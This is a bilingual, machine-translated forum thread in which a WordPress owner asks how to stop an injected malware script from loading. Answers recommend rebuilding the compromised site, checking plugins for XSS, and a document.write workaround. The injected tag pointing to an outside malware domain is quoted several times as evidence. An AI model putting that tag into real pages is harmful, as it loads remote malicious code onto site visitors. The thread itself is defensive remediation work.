防止恶意软件javascript执行
[英]prevent malware javascript from executing
问题描述
i am using a wordpress site, and i found a malware script, whenever i try to save page and click on text panel in WYSIWYG, a malware javascript tag is automatically added to the page. 
我正在使用wordpress网站,我发现了一个恶意软件脚本,每当我尝试保存页面并点击WYSIWYG中的文本面板时,恶意软件javascript标记会自动添加到页面中。 here is the script that is automatically added. 这是自动添加的脚本。
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
i tried to remove the src file by the following code. 我试图通过以下代码删除src文件。 but it didn't work, The script executes last before the closing of body tag. 但它没有用,脚本在关闭body标签之前执行。 I tried using this script, but the malware script loads after all javascript loaded. 我尝试使用此脚本,但恶意软件脚本在加载所有javascript后加载。 here is my code. 这是我的代码。
<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script>
I need to remove this code, or prevent this code from executing through javasript, jquery, ajax anything.. Just want to get rid of this. 我需要删除此代码,或阻止此代码通过javasript,jquery,ajax执行任何东西..只是想摆脱这个。 Thanks 谢谢
3 个解决方案
解决方案1
5 2013-07-31 23:56:31
If your server has been compromised you need to rebuild it: 如果您的服务器已被盗用,则需要重建它:
- Export your existing content 导出现有内容
- Rebuild the box with an up to date wordpress version 使用最新的wordpress版本重建该框
- Import your content 导入您的内容
- Regularly apply security updates 定期应用安全更新
Trying to use javascript to clean up the content is not a solution. 尝试使用javascript来清理内容不是一个解决方案。 You've got a compromised Wordpress installation and it's a matter of time before some other script-kiddy adds their own personal touches, or something worse happens. 你有一个妥协的Wordpress安装,其他一些脚本小伙子添加他们自己的个人接触,或者更糟糕的事情,这是一个时间问题。
解决方案2
1 2013-08-01 00:03:37
Seems like one of your Wordpress plugins is vulernable to XSS (cross-site scripting), i'd suggest you scan the web for vulnerabilities for this plugin. 看起来像你的一个Wordpress插件可以通过XSS (跨站点脚本),我建议你扫描网页上的这个插件的漏洞。 You can scan the source code of your plugins yourself for something that blindly sends the user back javascript without escaping it properly. 您可以自己扫描插件的源代码,以便盲目地将用户发送回javascript而无需正确转发。
You should follow Hamish's advice, my suggestion is just included here so that you wouldn't reinstall the offending plugin. 您应该遵循Hamish的建议,我的建议仅包含在此处,以便您不会重新安装有问题的插件。
解决方案3
-4 2013-08-01 00:02:57
You can inject the beginning of a new script tag right before your malware script executes via JavaScript: 您可以在恶意软件脚本通过JavaScript执行之前注入新脚本标记的开头:
document.write("<script type='application/x-suppress'>");
Basically here you are starting a new <script> block but not finishing it, assuming the very next thing that happens is the malware inserting it's block at the end 基本上你在这里开始一个新的<script>块但没有完成它,假设接下来发生的事情就是恶意软件在最后插入它的块
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
the final result will end up being 最终的结果将最终成为
<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
What will happen is the browser will see the first <script> tag and expect everything inside it to be JavaScript code. 接下来会发生的事情是浏览器将看到第一个<script>标记,并期望其中的所有内容都是JavaScript代码。 When it tries to parse the script ( <script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""> ) it will cause JavaScript parse errors and not do anything. 当它试图解析脚本( <script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""> )时,它将导致JavaScript解析错误而不做任何事情。 At the very end, your <script> block is closed via the </script> provided by your malware. 最后,您的<script>块将通过恶意软件提供的</script>关闭。
The real question is, why do you have this malware and how can you get rid of it? 真正的问题是,为什么你有这个恶意软件,你怎么能摆脱它? Rather than trying to work around it. 而不是试图解决它。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.